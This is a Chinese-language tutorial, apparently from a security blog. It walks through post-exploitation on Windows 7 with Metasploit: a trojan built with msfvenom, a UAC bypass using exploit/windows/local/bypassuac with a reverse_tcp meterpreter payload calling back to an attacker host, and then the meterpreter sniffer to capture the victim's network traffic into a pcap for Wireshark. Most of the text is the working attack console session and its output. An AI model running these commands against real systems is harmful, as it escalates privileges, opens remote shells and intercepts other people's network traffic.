1,使用msf,利用msfvenom生成木马程序,在win7 sp1测试通过.(http://www.2cto.com/Article/201304/199847.html)
2,使用sniffer模块
在win7 下要多加一步,就是过UAC.这里利用 exploit/windows/local/bypassuac
另外还有一个工具可以使用,不过没测:Win7Elevate32.exe
Bypass UAC: http://www.metasploit.com/modules/exploit/windows/local/bypassuac
view source01 meterpreter > background
02 [*] Backgrounding session 6...
03 msf exploit(handler) > use exploit/windows/local/bypassuac
04 msf exploit(bypassuac) > show options
05
06 Module options (exploit/windows/local/bypassuac):
07
08 Name Current Setting Required Description
09 ---- --------------- -------- -----------
10 SESSION 4 yes The session to run this module on.
11
12 Payload options (windows/meterpreter/reverse_tcp):
13
14 Name Current Setting Required Description
15 ---- --------------- -------- -----------
16 EXITFUNC process yes Exit technique: seh, thread, process, none
17 LHOST 192.168.0.133 yes The listen address
18 LPORT 443 yes The listen port
19
20 Exploit target:
21
22 Id Name
23 -- ----
24 0 Windows
25
26 msf exploit(bypassuac) > set SESSION 6
27 SESSION => 6
28 msf exploit(bypassuac) > exploit
29
30 [*] Started reverse handler on 192.168.0.133:443
31 [*] UAC is Enabled, checking level...
32 [+] UAC is set to Default
33 [+] BypassUAC can bypass this setting, continuing...
34 [*] Checking admin status...
35 [+] Part of Administrators group! Continuing...
36 [*] Uploading the bypass UAC executable to the filesystem...
37 [*] Meterpreter stager executable 73802 bytes long being uploaded..
38 [*] Uploaded the agent to the filesystem....
39 [*] Sending stage (752128 bytes) to 192.168.0.103
40 [*] Meterpreter session 7 opened (192.168.0.133:443 -> 192.168.0.103:2309) at 2013-04-02 00:34:51 +0800
41
42 meterpreter >
43 meterpreter > pwd
44 C:\Windows\System32
45
46 meterpreter > use sniffer
47 Loading extension sniffer...success.
48 meterpreter > sniffer_interfaces
49
50 1 - 'WAN Miniport (Network Monitor)' ( type:3 mtu:1514 usable:true dhcp:false wifi:false )
51 2 - 'Intel(R) 82567LM Gigabit Network Connection' ( type:0 mtu:1514 usable:true dhcp:false wifi:false )
52 3 - 'VMware Virtual Ethernet Adapter for VMnet1' ( type:0 mtu:1514 usable:true dhcp:false wifi:false )
53 4 - '11b/g/n Wireless LAN Mini-PCI Express Adapter II' ( type:0 mtu:1514 usable:true dhcp:true wifi:false )
54 5 - 'VMware Virtual Ethernet Adapter for VMnet8' ( type:0 mtu:1514 usable:true dhcp:false wifi:false )
55
56 meterpreter > sniffer_start 4
57 [*] Capture started on interface 4 (50000 packet buffer)
58 meterpreter > sniffer_stats 4
59 [*] Capture statistics for interface 4
60 packets: 2
61 bytes: 115
62 meterpreter > sniffer_stats 4
63 [*] Capture statistics for interface 4
64 packets: 173
65 bytes: 109330
66 meterpreter > sniffer_dump 4 /tmp/mydump.cap
67 [*] Flushing packet capture buffer for interface 4...
68 [*] Flushed 225 packets (122383 bytes)
69 [*] Downloaded 100% (122383/122383)...
70 [*] Download completed, converting to PCAP...
71 [*] PCAP file written to /tmp/mydump.cap
72 meterpreter > sniffer_stop 4
73 [*] Capture stopped on interface 4
74 [*] There are 32 packets (6987 bytes) remaining
75 [*] Download or release them using 'sniffer_dump' or 'sniffer_release'
76 meterpreter >
最后收集的网络数据包就可以用wireshark打开查看.找到感兴趣的内容
如对本文有疑问, 点击进行留言回复!!
我要评论
网友评论